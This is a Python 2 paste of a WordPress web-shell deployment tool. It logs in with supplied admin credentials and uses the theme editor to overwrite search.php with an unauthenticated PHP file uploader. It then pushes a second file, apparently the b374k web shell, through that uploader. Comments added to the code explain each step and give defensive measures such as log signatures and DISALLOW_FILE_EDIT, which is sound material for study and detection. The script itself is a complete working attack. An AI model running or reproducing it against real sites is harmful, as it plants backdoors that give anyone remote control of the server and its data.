
py

a guest
Jul 9th, 2017
  1. import requests, os, sys, time, random, re
  2. from colorama import Fore, Back, Style
  3. reload(sys)
  4. sys.setdefaultencoding('utf-8')
  5.  
  # Payload that the script later submits as the new content of the active
  # theme's search.php. The PHP renders a file-upload form and copies any
  # posted file to the client-supplied filename; it contains no login or
  # file-type check, so once written it is usable by anyone who can reach
  # the URL, not only by the account that planted it.
  # Defender note: the literal <title>Wordpress_project</title> marker is the
  # string the script searches for to confirm the write, which makes it a
  # usable content signature when scanning wp-content/themes for tampered
  # templates.
  6. shell_code = '''
  7. <title>Wordpress_project</title>
  8. <?php
  9. echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
  10. echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
  11. if( $_POST['_upl'] == "Upload" ) {
  12. if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Shell Uploaded ! :)<b><br><br>'; }
  13. else { echo '<b>Not uploaded ! </b><br><br>'; }
  14. }
  15. ?>
  16. '''
  17.  
  # Static headers passed on every request made through the session object.
  # The User-Agent never varies between runs, so the exact
  # "Windows NT 6.1; rv:36.0 ... Firefox/36.0" string can be matched in
  # web-server access logs alongside the request paths used further down.
  18. headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0',
  19. 'Accept': '*/*'}
  20.  
  # Clear the terminal. The boolean os.name == 'nt' is used as a list index:
  # False (0) selects 'clear', True (1) selects 'cls'. Both commands are
  # fixed literals; no external input reaches os.system here.
  21. def cls():
  22. linux = 'clear'
  23. windows = 'cls'
  24. os.system([linux, windows][os.name == 'nt'])
  25.  
  26.  
  # Print the ASCII-art banner one line at a time. Each line is wrapped in an
  # ANSI bold colour escape chosen at random from `colors` and followed by the
  # reset sequence in `clear`; a 0.05 s sleep between lines produces the
  # scrolling effect. Purely cosmetic: nothing here touches the network.
  27. def print_logo():
  28. clear = "\x1b[0m"
  29. colors = [36, 32, 34, 35, 31, 37]
  30.  
  31. x = """
  32.  
  33.  
  34. __ __ _
  35. \ \ / / | | Bala Sniper
  36. \ \ /\ / /__ _ __ __| |_ __ _ __ ___ ___ ___
  37. \ \/ \/ / _ \| '__/ _` | '_ \| '__/ _ \/ __/ __|
  38. \ /\ / (_) | | | (_| | |_) | | | __/\__ \__ |
  39. \/ \/ \___/|_| \__,_| .__/|_| \___||___/___/
  40. Version 1.0 | |
  41. |_|
  42. Wordpress Automatic Upload Shell V 1.0
  43. Welcome To Wordpress_project : )
  44. """
  # The enumerate index N is never used; only `line` is printed.
  45. for N, line in enumerate(x.split("\n")):
  46. sys.stdout.write("\x1b[1;%dm%s%s\n" % (random.choice(colors), line, clear))
  47. time.sleep(0.05)
  48.  
  49.  
  50.  
  # Executed at module load: clear the screen and show the banner before any
  # argument parsing or network activity takes place.
  51. cls()
  52. print_logo()
  53.  
  54.  
  55.  
  56.  
  # Return the value of the hidden "_wpnonce" form field found in the
  # module-level `source` string (assigned later, at top level, from the
  # theme-editor page), or None when nothing matches.
  # The bare except swallows every error, including the IndexError raised
  # when the pattern is absent, so failure is silent and the caller
  # receives None.
  # Defender note: the nonce is read from a page fetched with an already
  # authenticated session, so it gives no protection once the account's
  # credentials are known; it only guards against cross-site request forgery.
  57. def get_WpNoncE():
  58. try:
  59. find = re.findall('<input type="hidden" id="_wpnonce" name="_wpnonce" value="(.*?)"', source)
  60. path = find[0].strip()
  61. return path
  62. except:
  63. pass
  64.  
  65.  
  # Return the value of the first <option ... selected="selected"> element in
  # the module-level `source` string, or None when nothing matches. The
  # caller uses the result as the theme directory name when it builds the
  # /wp-content/themes/<name>/ paths (presumably this is the editor's theme
  # selector; the page markup itself is not shown here).
  # As in get_WpNoncE, the bare except hides every failure.
  66. def get_WpFlag():
  67. try:
  68. find = re.findall('<option value="(.*?)" selected="selected">', source)
  69. path = find[0].strip()
  70. return path
  71. except:
  72. pass
  73.  
  74.  
  # One requests session is created so that cookies set by the login response
  # are reused by the later wp-admin requests. The target base URL is taken
  # from the first command-line argument; when it is missing the script
  # prints a usage line and exits.
  75. sess = requests.session()
  76. try:
  77. url = sys.argv[1]
  78. except IndexError:
  79. print Fore.YELLOW + ' --------------------------------------------------------------------- '
  80. print Fore.YELLOW + ' [*] ' + Fore.CYAN + Fore.WHITE + ' python Script.py http://site.com'
  81. print(Style.RESET_ALL)
  82. sys.exit()
  83.  
  84.  
  # The script performs no credential guessing: the operator types a username
  # and password, so everything after this point presupposes an account that
  # is already compromised. Strong, unique administrator passwords and a
  # second authentication factor are the controls that address this step.
  85. username = raw_input(str((Fore.CYAN) + ' Username > ' + (Fore.YELLOW)))
  86. password = raw_input(str((Fore.CYAN) + ' Password > ' + (Fore.YELLOW)))
  87.  
  88. cls()
  89. print_logo()
  90.  
  # Standard WordPress login form fields, posted to /wp-login.php with a
  # redirect to /wp-admin/. No timeout is set on this request.
  91. admin_re_page = url + '/wp-admin/'
  92. login_go = url + '/wp-login.php'
  93. post_parm = {'log': username,'pwd': password, 'wp-submit':'Log+In','redirect_to':admin_re_page, 'testcookie':'1'}
  94.  
  95. Get_login = sess.post(login_go, data=post_parm, headers=headers)
  96.  
  # Login is treated as successful when the admin-bar logout entry appears in
  # the response body (presumably the /wp-admin/ page reached through
  # redirect_to).
  #
  # Defender summary of the branch below. Request sequence visible in access
  # logs: POST /wp-login.php, GET then POST /wp-admin/theme-editor.php
  # (file=search.php, action=update), followed by requests to
  # /wp-content/themes/<theme>/search.php and .../Access.php.
  # The whole path depends on the built-in theme file editor. Setting
  # define('DISALLOW_FILE_EDIT', true); in wp-config.php removes that editor;
  # keeping theme directories non-writable by the web-server user and running
  # file-integrity monitoring on wp-content/themes cover the write itself.
  97. if '<li id="wp-admin-bar-logout">' in Get_login.text.encode('utf-8'):
  98. ___Get_editor = admin_re_page + 'theme-editor.php?file=search.php#template'
  99. ___Get_edit = admin_re_page + 'theme-editor.php'
  # Fetch the editor page for search.php; its HTML is stored in the global
  # `source` that get_WpFlag() and get_WpNoncE() parse.
  100. Get_source = sess.get(___Get_editor, headers=headers, timeout=5)
  101. source = Get_source.text
  102. _Wp_FlaG = get_WpFlag()
  103. _Wp_NoncE = get_WpNoncE()
  104.  
  105.  
  # Form body for the editor's "update file" action: it replaces the theme's
  # search.php with shell_code. Either helper above may have returned None;
  # that case is not checked before the values are used.
  106. __data = {'_wpnonce':_Wp_NoncE,
  107. '_wp_http_referer':'/wp-admin/theme-editor.php?file=search.php',
  108. 'newcontent': shell_code,
  109. 'action': 'update',
  110. 'file': 'search.php',
  111. 'theme' :_Wp_FlaG,
  112. 'scrollto': '0',
  113. 'docs-list': '',
  114. 'submit': 'Update+File'}
  115.  
  116.  
  # Submit the overwrite, then request the modified template directly and look
  # for the 'Wordpress_project' marker to confirm the write took effect.
  117. sess.post(___Get_edit, data=__data, headers=headers)
  118. shell_PaTh = url + "/wp-content/themes/" + _Wp_FlaG + "/search.php"
  119. Check_sHell = sess.get(shell_PaTh, headers=headers)
  120. if 'Wordpress_project' in Check_sHell.text:
  # Second stage: a local file named Access.php (read from the working
  # directory; the file handle is never closed) is posted to the planted
  # form. These two requests use the bare `requests` module rather than
  # `sess`, so they carry no login cookies and no custom headers, which shows
  # the planted page accepts uploads from unauthenticated clients.
  # NOTE(review): the 'b374k' check suggests Access.php is expected to be the
  # b374k PHP web shell; that string is a candidate signature for scans.
  121. __po = {'_upl': 'Upload'}
  122. fil = {'file': open('Access.php', 'rb')}
  123. upload_shell = requests.post(shell_PaTh, data=__po, files=fil)
  124. shell_PaTh_DoNe = url + "/wp-content/themes/" + _Wp_FlaG + '/Access.php'
  125. Got_Shell = requests.get(shell_PaTh_DoNe, timeout=5)
  126. if 'b374k' in Got_Shell.text:
  127. print Fore.YELLOW + ' [+] ' + Fore.CYAN + 'Shell ---> ' + Fore.GREEN + shell_PaTh_DoNe
  128. print(Style.RESET_ALL)
  129. else:
  # The uploaded file was not confirmed; only the uploader URL is reported.
  130. print Fore.YELLOW + ' [+] ' + Fore.CYAN + 'Uploader ---> ' + Fore.GREEN + shell_PaTh
  131. print(Style.RESET_ALL)
  132.  
  133.  
  134. else:
  # The marker was not found in search.php, i.e. the editor write did not
  # take effect.
  135. print Fore.YELLOW + ' [-] ' + Fore.CYAN + url + Fore.RED + ' ---> Shell Not Uploaded'
  136. print(Style.RESET_ALL)
  137.  
  138.  
  139.  
  140. else:
  # Login marker absent: the credentials were rejected or the response was
  # not the admin page.
  141. print Fore.YELLOW + ' [-] ' + Fore.CYAN + url + Fore.WHITE + ' ---> i cant login :( try again'
  142. print(Style.RESET_ALL)